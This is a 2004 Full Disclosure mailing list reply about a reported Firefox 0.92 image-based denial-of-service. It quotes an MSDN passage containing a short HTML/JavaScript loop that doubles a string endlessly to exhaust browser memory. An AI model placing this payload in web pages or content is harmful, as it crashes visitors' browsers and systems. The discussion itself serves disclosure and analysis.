Full Disclosure mailing list archives
Re: AW: Firefox 0.92 DoS via TinyBMP
From: "morning_wood" <se_cur_ity () hotmail com>
Date: Mon, 12 Jul 2004 18:13:43 -0700
it seems to just be loading a bunch of data ( 1851MB ) via images to consume memory. the same effect can be accomplished here... http://msdn.microsoft.com/library/default.asp?url=/library/en-us/dninstj/html/privacyforbrowserusers.asp ---------- snip ---------- Such memory protection systems aren't foolproof. Even for normal memory and non-ActiveX controls, this script fragment will bring most browsers quickly to their knees (don't try this unless you're willing to re-boot): <HTML><BODY><SCRIPT> var big_string = "double me up!"; while (true) { big_string = big_string + big_string; // 20 iterations equals all your memory... } </SCRIPT></BODY></HTML> ---------- snip ---------- or not m.wood _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- Re: Firefox 0.92 DoS via TinyBMP, (continued)
- Re: Firefox 0.92 DoS via TinyBMP st3ng4h (Jul 12)
- Re: Firefox 0.92 DoS via TinyBMP Jordan Cole (stilist) (Jul 12)
- Re: Firefox 0.92 DoS via TinyBMP Maarten (Jul 12)
- Re: Firefox 0.92 DoS via TinyBMP Ali Campbell (Jul 12)
- Re: Firefox 0.92 DoS via TinyBMP st3ng4h (Jul 12)
- RE: Firefox 0.92 DoS via TinyBMP Sapheriel (Jul 12)
- RE: Firefox 0.92 DoS via TinyBMP jhaunsystem (Jul 12)
- RE: Firefox 0.92 DoS via TinyBMP Eric Paynter (Jul 13)
- Re: Firefox 0.92 DoS via TinyBMP st3ng4h (Jul 12)
- Re: AW: Firefox 0.92 DoS via TinyBMP Lee Packham (Jul 12)
- Re: AW: Firefox 0.92 DoS via TinyBMP morning_wood (Jul 12)
- RE: Firefox 0.92 DoS via TinyBMP Sapheriel (Jul 12)